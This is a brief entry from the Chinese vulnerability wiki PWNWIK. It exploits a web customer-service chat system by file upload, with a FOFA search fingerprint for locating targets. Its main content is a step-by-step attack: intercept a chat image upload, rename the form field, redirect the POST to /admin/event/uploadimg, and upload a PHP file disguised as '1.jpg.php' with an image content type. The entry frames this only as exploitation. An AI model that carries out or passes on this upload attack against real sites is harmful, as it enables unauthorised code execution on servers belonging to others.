PWNWIK.COM
,
FOFA
body="cgwl.ico"
漏洞利用
访问
/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1 //默认ID为1 接入客服 点击图片上传抓包 参数修改 Content-Disposition: form-data; name="upload" 修改为 Content-Disposition: form-data; name="editormd-image-file" POST请求 /admin/event/upload 改为 /admin/event/uploadimg POST /admin/event/uploadimg HTTP/1.1 Host: target ... Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.php" Content-Type: image/png
免费、自由、人人可编辑的漏洞库
